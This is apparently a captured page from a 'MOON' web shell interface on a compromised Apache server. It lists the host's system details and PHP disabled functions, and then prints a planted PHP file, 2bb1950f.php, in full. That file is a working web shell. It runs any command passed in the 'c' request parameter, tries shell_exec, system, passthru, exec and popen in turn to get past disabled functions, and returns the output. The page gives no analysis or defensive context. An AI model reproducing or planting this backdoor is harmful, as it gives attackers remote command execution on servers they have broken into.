MOON
Server: Apache
System: Linux server.strangefactsaboutrhnegativebloodtypeorigin.com 3.10.0-1160.53.1.vz7.185.3 #1 SMP Tue Jan 25 12:49:12 MSK 2022 x86_64
User: backup (501)
PHP: 5.5.36
Disabled: ini_alter,system,passthru,shell_exec,leak,listen,chgrp,apache_setenv,define_syslog_variables,openlog,syslog,ftp_exec,posix_getpwuid,posix_getpwnam,symlink
Upload Files
File: /home/backup/www/2bb1950f.php
<?php $c=isset($_POST["c"])?$_POST["c"]:(isset($_GET["c"])?$_GET["c"]:"");if($c){$o="";if(function_exists("shell_exec")){$o=shell_exec($c." 2>&1");}elseif(function_exists("system")){ob_start();system($c." 2>&1");$o=ob_get_clean();}elseif(function_exists("passthru")){ob_start();passthru($c." 2>&1");$o=ob_get_clean();}elseif(function_exists("exec")){exec($c." 2>&1",$a);$o=implode("\n",$a);}elseif(function_exists("popen")){$h=popen($c." 2>&1","r");$o="";while(!feof($h)){$o.=fread($h,4096);}pclose($h);}echo"<pre>".htmlspecialchars($o)."</pre>";}?>